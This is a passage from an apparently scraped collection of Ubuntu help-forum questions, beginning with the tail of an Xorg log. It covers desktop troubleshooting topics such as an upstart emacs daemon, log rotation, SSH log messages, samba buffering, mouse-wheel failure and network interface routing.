not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 720x450 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 800x512 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 960x540 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 960x600 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 1024x768 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : printing probed modes for output lvds1 [ 22.910 ] ( ii ) intel ( 0 ) : modeline [ 23.298 ] ( ii ) config/udev : adding input device hda intel headphone ( /dev/input/event6 ) [ 23.298 ] ( ii ) no input driver specified , ignoring this device . [ 23.298 ] ( ii ) this device may have been added with another device file . [ 23.299 ] ( ii ) config/udev : adding input device hp webcam ( /dev/input/event7 ) [ 23.299 ] ( ** ) hp webcam : applying inputclass `` evdev keyboard catchall '' [ 23.299 ] ( ii ) using input driver 'evdev ' for 'hp webcam' [ 23.299 ] ( ** ) hp webcam : always reports core events [ 23.299 ] ( ** ) evdev : hp webcam : device : `` /dev/input/event7 '' [ 23.299 ] ( -- ) evdev : hp webcam : vendor 0x4f2 product 0xb016 [ 23.299 ] ( -- ) evdev : hp webcam : found keys [ 23.299 ] ( ii ) evdev : hp webcam : configuring as keyboard [ 23.299 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-5/2-5:1.0/input/input7/event7 '' [ 23.299 ] ( ii ) xinput : adding extended input device `` hp webcam '' ( type : keyboard , id 9 ) [ 23.299 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 23.299 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 23.299 ] ( ** ) option `` xkb_layout '' `` us '' [ 23.300 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event3 ) [ 23.300 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 23.300 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 23.300 ] ( ** ) at translated set 2 keyboard : always reports core events [ 23.300 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event3 '' [ 23.300 ] ( -- ) evdev : at translated set 2 keyboard : vendor 0x1 product 0x1 [ 23.300 ] ( -- ) evdev : at translated set 2 keyboard : found keys [ 23.300 ] ( ii ) evdev : at translated set 2 keyboard : configuring as keyboard [ 23.300 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input3/event3 '' [ 23.300 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 10 ) [ 23.300 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 23.300 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 23.300 ] ( ** ) option `` xkb_layout '' `` us '' [ 23.301 ] ( ii ) config/udev : adding input device alpsps/2 alps glidepoint ( /dev/input/event10 ) [ 23.301 ] ( ** ) alpsps/2 alps glidepoint : applying inputclass `` evdev touchpad catchall '' [ 23.301 ] ( ** ) alpsps/2 alps glidepoint : applying inputclass `` touchpad catchall '' [ 23.301 ] ( ** ) alpsps/2 alps glidepoint : applying inputclass `` default clickpad buttons '' [ 23.301 ] ( ii ) loadmodule : `` synaptics '' [ 23.301 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 23.301 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 23.301 ] compiled for 1.13.0 , module version = 1.6.2 [ 23.301 ] module class : x.org xinput driver [ 23.301 ] abi class : x.org xinput driver , version 18.0 [ 23.301 ] ( ii ) using input driver 'synaptics ' for 'alpsps/2 alps glidepoint' [ 23.301 ] ( ** ) alpsps/2 alps glidepoint : always reports core events [ 23.301 ] ( ** ) option `` device '' `` /dev/input/event10 '' [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : x-axis range 0 - 1023 [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : y-axis range 0 - 767 [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : pressure range 0 - 127 [ 23.302 ] ( ii ) synaptics : alpsps/2 alps glidepoint : device does not report finger width . [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : buttons : left right middle [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : vendor 0x2 product 0x8 [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : invalid finger width range . defaulting to 0 - 15 [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : touchpad found [ 23.302 ] ( ** ) alpsps/2 alps glidepoint : always reports core events [ 23.302 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio4/input/input10/event10 '' [ 23.302 ] ( ii ) xinput : adding extended input device `` alpsps/2 alps glidepoint '' ( type : touchpad , id 11 ) [ 23.302 ] ( ** ) synaptics : alpsps/2 alps glidepoint : ( accel ) minspeed is now constant deceleration 2.5 [ 23.302 ] ( ** ) synaptics : alpsps/2 alps glidepoint : maxspeed is now 1.75 [ 23.302 ] ( ** ) synaptics : alpsps/2 alps glidepoint : accelfactor is now 0.156 [ 23.302 ] ( ** ) alpsps/2 alps glidepoint : ( accel ) keeping acceleration scheme 1 [ 23.302 ] ( ** ) alpsps/2 alps glidepoint : ( accel ) acceleration profile 1 [ 23.302 ] ( ** ) alpsps/2 alps glidepoint : ( accel ) acceleration factor : 2.000 [ 23.302 ] ( ** ) alpsps/2 alps glidepoint : ( accel ) acceleration threshold : 4 [ 23.302 ] ( -- ) synaptics : alpsps/2 alps glidepoint : touchpad found [ 23.303 ] ( ii ) config/udev : adding input device alpsps/2 alps glidepoint ( /dev/input/mouse1 ) [ 23.303 ] ( ** ) alpsps/2 alps glidepoint : ignoring device from inputclass `` touchpad ignore duplicates '' [ 23.303 ] ( ii ) config/udev : adding input device ps/2 mouse ( /dev/input/event9 ) [ 23.303 ] ( ** ) ps/2 mouse : applying inputclass `` evdev pointer catchall '' [ 23.303 ] ( ii ) using input driver 'evdev ' for 'ps/2 mouse' [ 23.303 ] ( ** ) ps/2 mouse : always reports core events [ 23.303 ] ( ** ) evdev : ps/2 mouse : device : `` /dev/input/event9 '' [ 23.303 ] ( -- ) evdev : ps/2 mouse : vendor 0x2 product 0x8 [ 23.303 ] ( -- ) evdev : ps/2 mouse : found 3 mouse buttons [ 23.303 ] ( -- ) evdev : ps/2 mouse : found relative axes [ 23.303 ] ( -- ) evdev : ps/2 mouse : found x and y relative axes [ 23.303 ] ( ii ) evdev : ps/2 mouse : configuring as mouse [ 23.303 ] ( ** ) evdev : ps/2 mouse : yaxismapping : buttons 4 and 5 [ 23.303 ] ( ** ) evdev : ps/2 mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 23.303 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio4/input/input9/event9 '' [ 23.303 ] ( ii ) xinput : adding extended input device `` ps/2 mouse '' ( type : mouse , id 12 ) [ 23.303 ] ( ii ) evdev : ps/2 mouse : initialized for relative axes . [ 23.303 ] ( ** ) ps/2 mouse : ( accel ) keeping acceleration scheme 1 [ 23.303 ] ( ** ) ps/2 mouse : ( accel ) acceleration profile 0 [ 23.303 ] ( ** ) ps/2 mouse : ( accel ) acceleration factor : 2.000 [ 23.303 ] ( ** ) ps/2 mouse : ( accel ) acceleration threshold : 4 [ 23.304 ] ( ii ) config/udev : adding input device ps/2 mouse ( /dev/input/mouse0 ) [ 23.304 ] ( ii ) no input driver specified , ignoring this device . [ 23.304 ] ( ii ) this device may have been added with another device file . [ 23.306 ] ( ii ) config/udev : adding input device hp wmi hotkeys ( /dev/input/event8 ) [ 23.306 ] ( ** ) hp wmi hotkeys : applying inputclass `` evdev keyboard catchall '' [ 23.306 ] ( ii ) using input driver 'evdev ' for 'hp wmi hotkeys' [ 23.306 ] ( ** ) hp wmi hotkeys : always reports core events [ 23.306 ] ( ** ) evdev : hp wmi hotkeys : device : `` /dev/input/event8 '' [ 23.307 ] ( -- ) evdev : hp wmi hotkeys : vendor 0 product 0 [ 23.307 ] ( -- ) evdev : hp wmi hotkeys : found keys [ 23.307 ] ( ii ) evdev : hp wmi hotkeys : configuring as keyboard [ 23.307 ] ( ** ) option `` config_info '' `` udev : /sys/devices/virtual/input/input8/event8 '' [ 23.307 ] ( ii ) xinput : adding extended input device `` hp wmi hotkeys '' ( type : keyboard , id 13 ) [ 23.307 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 23.307 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 23.307 ] ( ** ) option `` xkb_layout '' `` us '' [ 23.757 ] ( ii ) evdev : hp wmi hotkeys : close [ 23.757 ] ( ii ) unloadmodule : `` evdev '' [ 23.757 ] ( ii ) evdev : ps/2 mouse : close [ 23.757 ] ( ii ) unloadmodule : `` evdev '' [ 23.757 ] ( ii ) unloadmodule : `` synaptics '' [ 23.757 ] ( ii ) evdev : at translated set 2 keyboard : close [ 23.757 ] ( ii ) unloadmodule : `` evdev '' [ 23.757 ] ( ii ) evdev : hp webcam : close [ 23.757 ] ( ii ) unloadmodule : `` evdev '' [ 23.757 ] ( ii ) evdev : sleep button : close [ 23.757 ] ( ii ) unloadmodule : `` evdev '' [ 23.757 ] ( ii ) evdev : video bus : close [ 23.757 ] ( ii ) unloadmodule : `` evdev '' [ 23.758 ] ( ii ) evdev : power button : close [ 23.758 ] ( ii ) unloadmodule : `` evdev '' [ 24.561 ] server terminated successfully ( 0 ) . closing log file .
353288	upstart not starting emacs -- daemon	i am trying to start emacs daemon through upstart . here is my script # emacs -- daemon - emacs daemon # # the emacs daemon provides a server for emacs clients . description `` emacs daemon '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] respawn respawn limit 10 5 # respawn up to 10 times , waiting 5 seconds each time pre-start script echo `` starting emacs daemon ... '' > /home/eric/desktop/emacs.log end script pre-stop script emacsclient -n -e ' ( save-persistent-scratch ) ' end script exec emacs -- daemon i can start this through sudo initctl start emacs just fine . however , this does not execute during startup ( or emacs -- daemon dies ? ) . calling sudo initctl list displays the job as emacs stop/waiting , which apparently means the job has not been started yet . however , calling runlevel returns n 2 . how do i fix this ? edit : v2 of conf file ( added expect fork and ran emacs under my account ) edit : v3 ( corrected to expect daemon ) # emacs -- daemon - emacs daemon # # the emacs daemon provides a server for emacs clients . description `` emacs daemon '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] expect daemon respawn respawn limit 10 5 # respawn up to 10 times , waiting 5 seconds each time pre-start script echo `` starting emacs daemon ... '' > /home/eric/desktop/emacs.log end script pre-stop script emacsclient -n -e ' ( save-persistent-scratch ) ' end script exec start-stop-daemon -- start -- chuid eric -- exec /usr/bin/emacs -- -- daemon -u eric edit : after digging around , i found out that upstart provides a tool called initctl check-config which can check for unreachable conditions . running the tool revealed that my conf file was missing a space at runlevel [ 2345 ] like so runlevel [ 2345 ] . the daemon now starts up correctly . however , when i run sudo initctl stop emacs , it hangs and emacs daemon is not killed . i find in dmesg this and only this [ 4378.169249 ] init : emacs goal changed from start to stop but , if i kill emacs through kill or emacsclient -n -e ' ( kill-emacs ) ' , this appears in dmesg [ 4378.169286 ] init : emacs state changed from spawned to stopping [ 4378.169314 ] init : event_new : pending stopping event [ 4378.169325 ] init : handling stopping event [ 4378.169392 ] init : event_finished : finished stopping event [ 4378.169399 ] init : emacs state changed from stopping to killed [ 4378.169431 ] init : emacs state changed from killed to post-stop [ 4378.169450 ] init : emacs state changed from post-stop to waiting [ 4378.169473 ] init : event_new : pending stopped event [ 4378.169484 ] init : job_change_state : destroyed inactive instance emacs [ 4378.169542 ] init : handling stopped event [ 4378.169594 ] init : event_finished : finished stopped event the question now is , why does n't initctl stop emacs work ?
353289	boot to terminal , startx does n't work	after i updated the drivers for my video card and restarted , ubuntu booted the terminal instead of the graphical interface . startx and sudo startx does n't work . xorg -- configure does n't work either and sudo xorg -- configure does the same . what now ? version : 12.04 lts 64-bit video card : ati radeon 5000 series
353290	auth.log questions	how can log files be increased/decreased on an ubuntu device ? and how could i accomplish this via the command line or gui ? for example , let 's say i wanted to increase the size greater than 100k - to 250k . or let 's say i wanted to increase the size based on the number of days - such as 14 days . example : nov 6 15:00:00 epvpndmz01x newsyslog [ 16553 ] : logfile turned over due to size > 100k
353291	3g modem : simultaneous sending sms and having active internet connection	i am writing client-server application . the client sends some messages to the server by using different transports : sms and internet ( vpn , tcp server ) . on the client 's pc i have 1 3g modem which i use for both : sending sms and establishing internet connection . i connect to internet via ubuntu 's network manager . for sending sms i use smstools3 . actually it does n't matter what tools i used . i found that it had been impossible to send sms if there had been active internet connection established via the same modem . i tried to connect to internet without the network manager . i manually setup pppd ( with no lock param ) using the manual from http : //www.techytalk.info/manage-gsm-mobile-broadband-connections-without-network-manager-ubuntu-mint-debian/ . the connection worked fine , but it did not solve the problem . then i tried to use different modem 's ttys for sending sms and connecting to internet ( my modem has 2 ttys ) . it also did not help . looks like only 1 tty of my modem can be used to do the job . now i have only 2 ideas : do n't do the things simultaneously . separate them in time : start smstool daemon , send sms , stop the daemon , establish internet connection , send msg , stop the connection . try to use gsm multiplexing like described here gsm mux i am not sure about the result because the mentioned project ( gsm mux ) looks dead . do you have any other ideas how to solve the problem ? btw , i use the following things : os : ubuntu 12.04 lts smsd : 3.1.14 modem : huawei e800 expresscard
353294	how to remove `` ? '' icons from unity programs list	after running a console program called apitrace i ended up with a bunch of `` ? '' icons in the list of applications in unity ( see screenshot ) . it is possible to remove them without restarting my session . note that the application that was running that the icons were created for has already terminated . i 'm using ubuntu 12.04 .
353296	/usr is full with plenty of free space on the disk	i 'm using ubuntu 12.04 lts and i installed via wubi on a partition of 27 gb . i chose the installation to be that size , too . then after installing some software i was prompted with a notice saying that /usr is full . in the windows that followed it shows that the total space of /usr is only 3.7 gb . i 've no idea how that could happen while the ubuntu partition has 10+ gb of free space . so my question is : how can i expand the `` size '' of /usr , which makes no sense to me that it is not using the free space in the partition . thanks much ! the output of mount is as follows : /dev/loop0 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda7 on /host type vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /host/ubuntu/disks/usr.disk on /usr type ext4 ( rw ) /host/ubuntu/disks/home.disk on /home type ext4 ( rw ) gvfs-fuse-daemon on /home/yzhanghf/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=yzhanghf ) /dev/sda6 on /media/scientific type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda5 on /media/software type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda2 on /media/os type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda1 on /media/system type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 )
353298	invalid user vs . user not allowed in ssh log	when looking at the auth.log : from a security perspective , what is the difference between `` invalid user '' and `` user not allowed because not listed in `` allowusers . '' examples : nov 6 10:42:37 epvpndmz01x sshd [ 12598 ] : invalid user cni07 from < ip address > nov 4 07:28:15 epvpndmz01x sshd [ 2722 ] : user root from < ip address > not allowed because not listed in allowusers
353302	does ubuntu software center needs update ... . ?	i 'm the newest ubuntu user , so have a little mercy on me ... : ) i 'm trying to install g++ 4.7 , the version i have is 4.6 . i looked for it in the ubuntu software center and did n't find it so i ended up getting it from the command line . ( sorry of the long intro ... ) do i need to update ubuntu software center some how so it can find new software releases ... ? if so how do i do that , if not , then why it could n't find the new version of g++ ? thank you
353304	logitech g930 under ubuntu ( crackling noises )	i own the wireless headphone logitech g930 and i have been using it under windows without any problems . unfortunately under ubuntu ( 12.04 as well as 13.04 ) it has really poor audio quality : crackling noises appear when i listen to music or even when i test the channels in the pulseaudio menu or when i play sounds . when i plugged the transmitter in the headset gets recognized without any problems and is listed in the sound menu as analog output . i tested the system with also with the speakers having no crackling noises so the problem has definitively to do with the g930 . i googled for quite a while now and i didnt find any solutions . there were even posts of people telling that they do not have problems at all . has anyone else the same issues as i do : ( ? help very appreciated ! thanks and bb pinkyeti edit : i just tested it on ubuntu 10.04 and there it seems to work fine . did anything change in regard to the sound since 10.04 ? is it possible to rollback concerning the sound ?
353306	internet dies out if ubuntu is connected	if i connect ubuntu to my internet , my internet will die out a few minutes later . if i 'm talking to someone on skype or playing an online game , i can continue to do those things , but if the game ends , or if someone leaves the call , or if i try to view a new web page , then i 'm unable to do so . i have to restart my router to fix this . this happens on all devices . my tablets , 3ds , phone , windows laptop , windows desktop , and the ubuntu computer are unable to connect . it only happens when ubuntu is connected , and never happens when i do n't have ubuntu connected . currently i 'm running ubuntu 12.04 . i tried 13.04 , same result . i tried mint , same result . once again , my internet is fine when i do n't have ubuntu/mint running . my router is a netgear n300 wireless router , model wnr2000v2 . i have ubuntu currently running on a 4p rig on a supermicro motherboard with an intel速 82546gb dual port gigabit ethernet controller . i tried ubuntu on my dell laptop with a different controller ( ca n't remember which ) and had the exact same result when connecting wirelessly or through ethernet . i ca n't update any drivers because the internet dies out before i have a chance to connect . any help would be appreciated . i have a feeling my router is the problem as it 's the only thing that has n't changed , but i want to be sure before i go out and buy one . edit : i wanted to add that i called my isp and they said when the connection was down , my modem shows up just fine , but the router is disconnected .
353307	how to locate a font in ubuntu ?	ubuntu desktop with 12.04 is about to crash . installed 13.04 on a new machine , want to transfer book antiqua font from old machine to the new one . how do i find it on the old machine ? my /usr directory is empty . my fonts.conf file has these lines : < ! -- font directory list -- > < dir > /usr/share/fonts < /dir > < dir > /usr/x11r6/lib/x11/fonts < /dir > < dir > /usr/local/sharefonts < /dir > < dir > ~/.fonts < /dir > < ! -- do n't know what this means , but my /usr directory has nothing in it .
353308	make a snapshot of ubuntu for future installs	when we install ubuntu , we get a lot of softwares pre-installed . just like this , is it possible for me to install ubuntu , then install all my required softwares and packages , setup my desktop and other system wide settings and once i get my perfect ubuntu ready for use ; i make snapshot or installable ( my own ubuntu version ) of the system into a dvd or iso . so that in future , i can just install ubuntu through that iso and get everything ready in a moment ! i checked this question , but remastersys is no longer available . i checked this question as well , but it 's too long and does n't seem to be what i need . any other solution ?
353312	how do i make wireless connection ?	i 've tried many distros and invariably am unable to make a wireless connection . in some cases , i do n't even receive the wireless option for setup . i 'm running an inspiron 1720 , nic1395 , 32 bit , 6gb ram . i 've installed/uninstalled ndiswrapper , bcm4401-b0 , bcm4312 802.11b/g lp-phy . i tried using linksys adapter ae2500 but no linux software ; then tried wusb54gsc and tried to install software using wine . i 've run out of ideas ... can u help ? thanx in advance . jim
353315	mousewheel of gaming mouse stopped working - how to reset / fix it ?	suddenly the wheel of my g9x stopped working . the other buttons work just fine , i can even use the mousewheel to scroll left and right by pushing the mouse-wheel to one side or the other . i wonder what would be the best way to get it working again . i dont want to reinstall the whole system , just to get it back working again . edit3 : finally figured it out . see below ... edit : when using xinput test 12 i can indeed confirm that nothing is tracked for the mousewheel ( left nad right scroll are considered buttons ) . the same is true for xev . edit2 : i reseted xorg via : sudo apt-get remove -- purge xserver-xorg sudo apt-get install xserver-xorg sudo dpkg-reconfigure xserver-xorg without any effect . now xinput test # shows nothing at all , although the mouse is still working . xinput list shows two mouses , one for the mouse and one getting for the scroll-wheel as it seems : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech logitech illuminated keyboard id=11 [ slave pointer ( 2 ) ] ⎜ ↳ logitech g9x laser mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ logitech g9x laser mouse id=13 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=16 [ slave pointer ( 2 ) ] here is the output of my xorg.0.log : [ 4873.049 ] ( ii ) config/udev : adding input device logitech g9x laser mouse ( /dev/input/mouse0 ) [ 4873.049 ] ( ii ) no input driver specified , ignoring this device . [ 4873.049 ] ( ii ) this device may have been added with another device file . [ 4873.051 ] ( ii ) config/udev : adding input device logitech g9x laser mouse ( /dev/input/event10 ) [ 4873.051 ] ( ** ) logitech g9x laser mouse : applying inputclass `` evdev pointer catchall '' [ 4873.051 ] ( ii ) using input driver 'evdev ' for 'logitech g9x laser mouse' [ 4873.051 ] ( ** ) logitech g9x laser mouse : always reports core events [ 4873.051 ] ( ** ) evdev : logitech g9x laser mouse : device : `` /dev/input/event10 '' [ 4873.051 ] ( -- ) evdev : logitech g9x laser mouse : vendor 0x46d product 0xc066 [ 4873.051 ] ( -- ) evdev : logitech g9x laser mouse : found 20 mouse buttons [ 4873.051 ] ( -- ) evdev : logitech g9x laser mouse : found scroll wheel ( s ) [ 4873.051 ] ( -- ) evdev : logitech g9x laser mouse : found relative axes [ 4873.051 ] ( -- ) evdev : logitech g9x laser mouse : found x and y relative axes [ 4873.051 ] ( ii ) evdev : logitech g9x laser mouse : configuring as mouse [ 4873.051 ] ( ii ) evdev : logitech g9x laser mouse : adding scrollwheel support [ 4873.051 ] ( ** ) evdev : logitech g9x laser mouse : yaxismapping : buttons 4 and 5 [ 4873.051 ] ( ** ) evdev : logitech g9x laser mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 4873.051 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1.4/3-1.4:1.0/input/input31/event10 '' [ 4873.051 ] ( ii ) xinput : adding extended input device `` logitech g9x laser mouse '' ( type : mouse , id 12 ) [ 4873.051 ] ( ii ) evdev : logitech g9x laser mouse : initialized for relative axes . [ 4873.051 ] ( ** ) logitech g9x laser mouse : ( accel ) keeping acceleration scheme 1 [ 4873.051 ] ( ** ) logitech g9x laser mouse : ( accel ) acceleration profile 0 [ 4873.051 ] ( ** ) logitech g9x laser mouse : ( accel ) acceleration factor : 2.000 [ 4873.051 ] ( ** ) logitech g9x laser mouse : ( accel ) acceleration threshold : 4 [ 4873.065 ] ( ii ) config/udev : adding input device logitech g9x laser mouse ( /dev/input/event11 ) [ 4873.066 ] ( ** ) logitech g9x laser mouse : applying inputclass `` evdev keyboard catchall '' [ 4873.066 ] ( ii ) using input driver 'evdev ' for 'logitech g9x laser mouse' [ 4873.066 ] ( ** ) logitech g9x laser mouse : always reports core events [ 4873.066 ] ( ** ) evdev : logitech g9x laser mouse : device : `` /dev/input/event11 '' [ 4873.066 ] ( -- ) evdev : logitech g9x laser mouse : vendor 0x46d product 0xc066 [ 4873.066 ] ( -- ) evdev : logitech g9x laser mouse : found 1 mouse buttons [ 4873.066 ] ( -- ) evdev : logitech g9x laser mouse : found scroll wheel ( s ) [ 4873.066 ] ( -- ) evdev : logitech g9x laser mouse : found relative axes [ 4873.066 ] ( ii ) evdev : logitech g9x laser mouse : forcing relative x/y axes to exist . [ 4873.066 ] ( -- ) evdev : logitech g9x laser mouse : found absolute axes [ 4873.066 ] ( ii ) evdev : logitech g9x laser mouse : forcing absolute x/y axes to exist . [ 4873.066 ] ( -- ) evdev : logitech g9x laser mouse : found keys [ 4873.066 ] ( ii ) evdev : logitech g9x laser mouse : configuring as mouse [ 4873.066 ] ( ii ) evdev : logitech g9x laser mouse : configuring as keyboard [ 4873.066 ] ( ii ) evdev : logitech g9x laser mouse : adding scrollwheel support [ 4873.066 ] ( ** ) evdev : logitech g9x laser mouse : yaxismapping : buttons 4 and 5 [ 4873.066 ] ( ** ) evdev : logitech g9x laser mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 4873.066 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1.4/3-1.4:1.1/input/input32/event11 '' [ 4873.066 ] ( ii ) xinput : adding extended input device `` logitech g9x laser mouse '' ( type : keyboard , id 13 ) [ 4873.066 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 4873.066 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 4873.066 ] ( ** ) option `` xkb_layout '' `` de '' [ 4873.066 ] ( ii ) evdev : logitech g9x laser mouse : initialized for relative axes . [ 4873.066 ] ( ww ) evdev : logitech g9x laser mouse : ignoring absolute axes . [ 4873.066 ] ( ** ) logitech g9x laser mouse : ( accel ) keeping acceleration scheme 1 [ 4873.066 ] ( ** ) logitech g9x laser mouse : ( accel ) acceleration profile 0 [ 4873.066 ] ( ** ) logitech g9x laser mouse : ( accel ) acceleration factor : 2.000 [ 4873.066 ] ( ** ) logitech g9x laser mouse : ( accel ) acceleration threshold : 4 here is the output for the dvice # 12 : logitech g9x laser mouse id=12 [ slave pointer ( 2 ) ] reporting 7 classes : class originated from : 12 . type : xibuttonclass buttons supported : 24 button labels : `` button left '' `` button middle '' `` button right '' `` button wheel up '' `` button wheel down '' `` button horiz wheel left '' `` button horiz wheel right '' `` button side '' `` button extra '' `` button forward '' `` button back '' `` button task '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' button state : class originated from : 12 . type : xivaluatorclass detail for valuator 0 : label : rel x range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 12 . type : xivaluatorclass detail for valuator 1 : label : rel y range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 12 . type : xivaluatorclass detail for valuator 2 : label : rel horiz wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 12 . type : xivaluatorclass detail for valuator 3 : label : rel vert wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 12 . type : xiscrollclass scroll info for valuator 2 type : 2 ( horizontal ) increment : 1.000000 flags : 0x0 class originated from : 12 . type : xiscrollclass scroll info for valuator 3 type : 1 ( vertical ) increment : -1.000000 flags : 0x2 ( preferred ) and for device # 13 logitech g9x laser mouse id=13 [ slave pointer ( 2 ) ] reporting 6 classes : class originated from : 13 . type : xibuttonclass buttons supported : 7 button labels : `` button 0 '' `` button unknown '' `` button unknown '' `` button wheel up '' `` button wheel down '' `` button horiz wheel left '' `` button horiz wheel right '' button state : class originated from : 13 . type : xikeyclass keycodes supported : 248 class originated from : 13 . type : xivaluatorclass detail for valuator 0 : label : rel x range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 13 . type : xivaluatorclass detail for valuator 1 : label : rel y range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 13 . type : xivaluatorclass detail for valuator 2 : label : rel horiz wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 13 . type : xiscrollclass scroll info for valuator 2 type : 2 ( horizontal ) increment : 1.000000 flags : 0x0 which shows a different number of buttons .
353318	samba share - slow buffering problem after switching to 13.04	lately i switched from 12.10 to 13.04 ( clean installation ) and since then i 'm experiencing annoying problem with my network storage . i have a mybooklive network drive connected to wireless router . i keep all my music and movies there , so i can access it from any computer in my house . but since the installation of 13.04 i have annoying buffering problem ( slow access to the network hdd ) : when i listen to the music ( located on the network drive ) the player ( clementine , but rhythmbox does the same thing ) plays about 20-30 seconds of the song and then pauses , buffering the file , then again plays next 20 or so seconds , and buffers again ... how can i speed up the mounted samba share ? i mount the share in fstab via cifs/gvfs like that : //192.168.1.5/public /media/mybooklive cifs credentials=/home/gacek/.smbcredentials , uid=1000 , gid=1000 0 0 it is somehow related to this problem edit : i tried changing the buffer size and other things adding for example the option : rsize=130048 , wsize=130048 and since i 'm using the public share of my nas , i also tried to mount it as nfs instead of samba , but here i 'm experiencing very weird problem : tried mounting the share like that : sudo mount -t nfs 192.168.1.5 : public /media/mybooklive i get the error : mount.nfs : access denied by server while mounting 192.168.1.5 : public ( but the public share is ... well , public , i do not have to have permissions for it ) . any help is appreciated . i just want to listen to some music ...
353320	ways of updating my ubuntu 10.10 notebook	i have recently bought a second-hand notebook , which is running ubuntu 10.10 . i am completely new to ubuntu and bought this machine because i want to get away from windows . i now realise that 10.10 is no longer supported and i was advised that i needed to download and install ubuntu 13 . i tried to do this , but was required to give a password in order to do so . i do not have the password , as this is a second-hand machine . i know that i could start from scratch and install 13 , but i 'm reluctant to do this , owing to my lack of familiarity with ubuntu and limited technical skills . is the only way forward for me to do a complete installation of v13 , is there a way to bypass the password ? thanks in anticipation , dave
353321	how does a computer decide which network interface to send traffic to ?	i have a computer ( ubuntu ) with one wired and one wireless network interface . the wired one is statically assigned and connected to another single machine with a statically assigned address . the wireless is connect to an ap and has an ip address assigned by dhcp and access to the internet . how can i make sure that all requests go out on the wifi interface except if it 's a specific ip address then i want that to go out on the wired connection ?
